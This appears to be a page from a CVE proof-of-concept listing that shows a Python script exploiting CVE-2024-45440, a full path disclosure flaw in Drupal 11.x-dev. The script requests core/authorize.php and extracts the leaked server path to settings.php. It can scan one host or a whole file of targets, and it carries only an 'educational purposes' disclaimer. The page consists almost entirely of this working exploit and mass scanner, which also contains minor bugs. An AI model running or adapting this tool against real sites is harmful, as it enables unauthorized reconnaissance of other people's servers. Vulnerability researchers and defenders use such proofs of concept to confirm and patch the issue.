4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-45440
README.md
Rendering markdown...
POC / CVE-2024-45440.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
import re
import requests


def banners():
    cve_id = "CVE-2024-45440"
    description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
                  "core/authorize.php allows Full Path Disclosure (even when error logging is None) " \
                  "if the value of hash_salt is file_get_contents of a file that does not exist."
    disclaimer = "This tool is for educational purposes only. Any misuse of this information is the responsibility of " \
                 "the person utilizing this tool. The author assumes no responsibility or liability for any misuse or " \
                 "damage caused by this program."
    width = 100
    banner_top_bottom = "=" * width
    banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
    banner = f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
    return banner


def scan_single_url(url=None):
    if url is None:
        print("[+] Input the IP/Domain      Example: 127.0.0.1  or  127.0.0.1:8080")
        url = input("[+] IP/Domain: ")
    if not url.startswith('https://') and not url.startswith('http://'):
        full_url = 'http://' + url + '/core/authorize.php'
    print("[*] Scanning...")
    try:
        headers = {
            "Host": url,
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
        }
        response = requests.get(full_url, headers,timeout=10)
        pattern = r'<em class="placeholder">(/.*?settings\.php)'
        matches = re.findall(pattern, response.text)
        # print(response.text)
        if 'settings.php' in response.text:
            print(f"[+] {url} Existed!")
            for match in matches:
                print("[+] The full path is:", match)
                return True
        else:
            print(f"[-] {url} Not Exist!")
            return False
    except TimeoutError:
        print(f"[-] {url} Timeout!")
    except Exception as e:
        print(f"[-] {url} Failed!")
        return False

def scan_multiple_urls():
    print("[+] Input the path of txt        Example: ./url.txt  or  C:\\the\\path\\to\\url.txt")
    url_path = input("[+] Path: ")
    url_list = []
    result_list = []
    try:
        with open(url_path, 'r', encoding='utf-8') as f:
            lines = f.readlines()
            for line in lines:
                url_list.append(line.strip())
    except FileNotFoundError as e:
        print("[-] File Not Found!")
    for url in url_list:
        result = scan_single_url(url)
        if result:
            result_list.append(url)
    print("[+] Successful Target:")
    for result in result_list:
        print(f"[+] {result}")


def main():
    print(banners())
    print("[1] Scan single url\n[2] Scan multiple urls")
    choice = input("[+] Choose: ")
    if choice == '1':
        scan_single_url()
    elif choice == '2':
        scan_multiple_urls()
    else:
        print("[-] Invalid option selected!")
    pass


if __name__ == '__main__':
    main()